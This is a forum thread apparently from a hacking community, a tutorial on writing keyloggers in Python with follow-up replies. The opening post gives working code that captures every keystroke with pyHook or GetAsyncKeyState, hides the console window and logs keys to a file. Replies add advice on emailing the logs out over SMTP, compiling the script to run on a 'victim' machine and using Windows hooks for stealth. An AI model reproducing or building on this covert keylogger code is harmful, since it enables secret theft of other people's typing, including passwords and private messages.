Programming Keyloggers

DON'T post new tutorials here! Please use the "Pending Submissions" board so the staff can review them first.
Post Reply
User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00
18

Programming Keyloggers

Post by maboroshi »

How to Write a software Keylogger

According to wiki key loggers perform the following
Keystroke logging (often called keylogging) is a method of capturing and recording user keystrokes.
Although now a days you would also want to capture mouse events. I won't be getting into mouse hooks in this tutorial. Some one else can do that if they like. The language I will use will be python obviously not the best choice but you can convert it into your desired language: C, Java or whatever.

My First example: A Module designed for this purpose:

A lot of languages will have key logging modules already available for use, python has one called PyHook. Here is an example of PyHook

Code: Select all

import pythoncom, pyHook 

def OnKeyboardEvent(event):
	print event.Key
	return True
 
# create a hook manager
hm = pyHook.HookManager()
# watch for all key events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()
We import our modules then create a function and pass it an event parameter what this does is tell python an event should occur (in this case our keyboard input)

We then call our pyHook functions to listen for our keyboard input.

Wow a keylogger in about 8 – 20 lines of code

Next we can move on to win api

Code: Select all

import win32api 
import win32console 
import win32gui 
win = win32console.GetConsoleWindow() 
win32gui.ShowWindow(win, 0) 
try: 
    mylog_file = open("/HOME/output.txt","a") 
except IOError: 
    print "Error grabbing file" 
else: 
    while 1:  
        for i in range(32, 256): 
            keyit = win32api.GetAsyncKeyState(i) 
            if keyit == -32767: 
                keyEnd = 81 
                mylog_file.write(chr(i)) 
                if i == keyEnd: 
                    mylog_file.close() 
                    keyin = open("/HOME/output.txt","r") 
                    data = keyin.read()
Ok this is a bit more drastic code with some extras. If you don't know what winapi is I suggest you read up on it. It will give you a lot of insight into coding

import necessary modules

Code: Select all

import win32api 
import win32console 
import win32gui
we then hide the console window

Code: Select all

win = win32console.GetConsoleWindow() 
win32gui.ShowWindow(win, 0)
try and open a file for logging. Python tends to automagically create one if it's not there

Code: Select all

try: 
    mylog_file = open("/HOME/output.txt","a") 
except IOError: 
    print "Error grabbing file"
get our range of Keys and call the winapi GetAsyncKeyState Function what this does according to microsoft
The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

Code: Select all

 for i in range(32, 256): 
            keyit = win32api.GetAsyncKeyState(i)
If Shift Q is pressed log data to File

Code: Select all

keyEnd = 81 
                mylog_file.write(chr(i)) 
                if i == keyEnd: 
                    mylog_file.close() 
                    keyin = open("/HOME/output.txt","r") 
                    data = keyin.read()
Alright that wasn't so bad was it :-P


This is just code to be a starting point I do not say these ways are the best or only ways its more or less meant as a very basic introduction to coding keyloggers

Next article (Sending keystrokes over the network)

By Maboroshi

Resources

Code: Select all

Wiki http://en.wikipedia.org/wiki/Keystroke_logging
PyHook http://pyhook.wiki.sourceforge.net/
GetAsyncKeyState http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx
Last edited by maboroshi on 26 Apr 2009, 14:47, edited 2 times in total.
Top
ebrizzlez
Kage
Kage
Posts: 732
Joined: 31 Mar 2007, 16:00
17
Location: Hidden in a Buffer Protection.
Contact:
Contact ebrizzlez

Post by ebrizzlez »

Nice tut mabo. :wink:

With python you can also import the sockets library and do a telnet connect to a SMTP server and send the log as to an email. They're so many possibilities and more.

The only set back in python is , to run this keylogger the python interpreter has to run the script which means its useless if the victim doesnt have python installed. So your alternative is to grab a python compiler, and try to compile the code into a executable that can run in system memory. :)
[img]http://i81.photobucket.com/albums/j205/ebrizzlez/4lsint1.jpg[/img]
Top
User avatar
IceDane
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 197
Joined: 12 Aug 2009, 16:00
14

Post by IceDane »

I just saw this thread now, but I assumes that since this is a tutorial, I am allowed to 'revive the thread'.

I would just like to comment on your choice of method for keylogging; GetAsyncKeyState is the worst of all. Using it, you are basically polling the keyboard's state as many times as possible every second. I haven't made one myself that uses it(Because it was pointless), but I can imagine that it might eat your CPU resources.

Best case scenario, it doesn't eat your CPU, but it's as sneaky as a fat kid walking through the park, beating his belly while yodeling.

Use windows hooks. SetWindowsHookEx and so on. But I'm pretty sure that's what python is doing in the first example, anyway.
Top
User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1624
Joined: 28 Aug 2005, 16:00
18

Oh I agree

Post by maboroshi »

Oh I agree IceDane

But GetAsyncKeyState is a good start. :-) But if you like feel free to add a tutorial on writing KeyLoggers with a better method. Perhaps in a language better suited for it like C++ :-)
Top
Post Reply

Return to “Development/Coding”